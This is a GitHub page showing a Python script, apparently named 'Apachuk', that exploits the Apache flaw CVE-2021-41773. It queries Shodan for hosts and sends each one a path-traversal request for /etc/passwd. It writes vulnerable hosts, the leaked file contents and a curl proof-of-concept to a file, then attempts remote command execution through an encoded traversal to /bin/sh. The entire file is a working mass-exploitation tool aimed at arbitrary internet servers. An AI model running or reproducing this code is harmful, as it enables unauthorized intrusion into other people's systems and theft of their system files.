-
Notifications
You must be signed in to change notification settings - Fork 4
/
main.py
98 lines (84 loc) · 4.17 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
#!/usr/bin/python3
import argparse
import urllib.request
from termcolor import colored
import sys
import shodan
import socket
import requests
#Show Banner
def banner():
print(colored("""
_ _ _
/ \ _ __ __ _ ___| |__ _ _| | __
/ _ \ | '_ \ / _` |/ __| '_ \| | | | |/ /
/ ___ \| |_) | (_| | (__| | | | |_| | <
/_/ \_\ .__/ \__,_|\___|_| |_|\__,_|_|\_\
|_|
[CVE-2021-41773 Grabber]
""",'green'))
#Parsing Argument
def parse_args():
parser = argparse.ArgumentParser(epilog='\tExample: \r\npython3 ' + sys.argv[0] + " -d google.com")
parser.error = parser_error
parser._optionals.title = "OPTIONS"
parser.add_argument('-a', '--api-key', help="Shodan API Key", required=True)
parser.add_argument('-k', '--keyword', help='Keyword For Shodan', nargs='?', required=False)
return parser.parse_args()
#Show an Error
def parser_error(errmsg):
banner()
print(colored("Usage: python3 " + sys.argv[0] + " [Options] use -h for help",'red'))
sys.exit()
#Execution Command
def interactive():
args = parse_args()
ApiKey = args.api_key
Keyword = args.keyword
banner()
getApiKey = shodan.Shodan(ApiKey)
result = getApiKey.search_cursor(Keyword)
print(colored("[INFO] API KEY VALID", 'green'))
output = open("vulnerable-host.txt","a")
try:
for apacheSearchResult in result:
try:
payload_directory = "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
url = "http://"+apacheSearchResult["ip_str"]+payload_directory+"\n"
req = urllib.request.Request(url)
try:
connectToServer = urllib.request.urlopen(req, timeout=5)
if connectToServer.status == 200:
ReadData = connectToServer.read().decode('utf-8')
if "/bin/" in ReadData:
print(colored('[VULN] Server %s IS VULNERABLE Directory Traversal' % apacheSearchResult["ip_str"]+"",'red') )
output.write("IP : " + apacheSearchResult["ip_str"] + "\nport:" + str(apacheSearchResult["port"]) + "\nhostnames : " + str(apacheSearchResult["hostnames"]) +"\n"+ ReadData+"\n" + "PoC: curl -v --path-as-is "+url+"\n")
try:
payload_rce = "/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh"
url = "http://"+apacheSearchResult["ip_str"]+payload_rce+"\n"
s = requests.Session()
req = requests.Request(method='POST' , url=url, data="echo; uname")
prep = req.prepare()
prep.url = url
r = s.send(prep, verify=False, timeout=10)
if r.text.strip() == "Linux" or r.text.strip() == "linux":
print(colored("[VULN] Server %s IS VULNERABLE RCE"+apacheSearchResult["ip_str"],'red'))
open("vulnerable-rce.txt", "a").write(apacheSearchResult["ip_str"]+"\n")
else:
print(colored('[INFO] Server %s IS NOT VULNERABLE RCE' % apacheSearchResult["ip_str"],'red'))
except:
pass
else:
print(colored('[INFO] Server %s IS NOT VULNERABLE' % apacheSearchResult["ip_str"],'yellow'))
except urllib.error.URLError as e:
print(colored('[INFO] Server %s IS Error' % apacheSearchResult["ip_str"],'yellow'))
except socket.timeout:
print(colored('[INFO] Server %s IS NOT RESPONSE' % apacheSearchResult["ip_str"],'yellow'))
except:
print(colored("[INFO] Server %s Ruwettt Bossque " % apacheSearchResult["ip_str"],'yellow'))
continue
output.close()
except KeyboardInterrupt:
sys.exit(1)
if __name__ == "__main__":
interactive()